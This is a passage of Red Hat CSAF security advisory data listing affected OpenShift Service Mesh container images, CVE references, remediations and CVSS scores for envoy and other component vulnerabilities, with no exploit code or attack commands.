"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45806", }, { category: "external", summary: "RHBZ#2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45806", url: "https://www.cve.org/CVERecord?id=CVE-2024-45806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", }, ], release_date: "2024-09-20T00:15:02.293000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Potential to manipulate `x-envoy` headers from external sources", }, ], }
rhsa-2024:7724
Vulnerability from csaf_redhat
Published
2024-10-07 09:22
Modified
2025-04-10 00:21
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.4.11
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Service Mesh Containers for 2.4.11\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7724", url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7724.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11", tracking: { current_release_date: "2025-04-10T00:21:23+00:00", generator: { date: "2025-04-10T00:21:23+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:7724", initial_release_date: "2024-10-07T09:22:37+00:00", revision_history: [ { date: "2024-10-07T09:22:37+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T09:22:37+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:21:23+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHOSSM 2.4 for RHEL 8", product: { name: "RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.4::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Service Mesh", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", product_id: 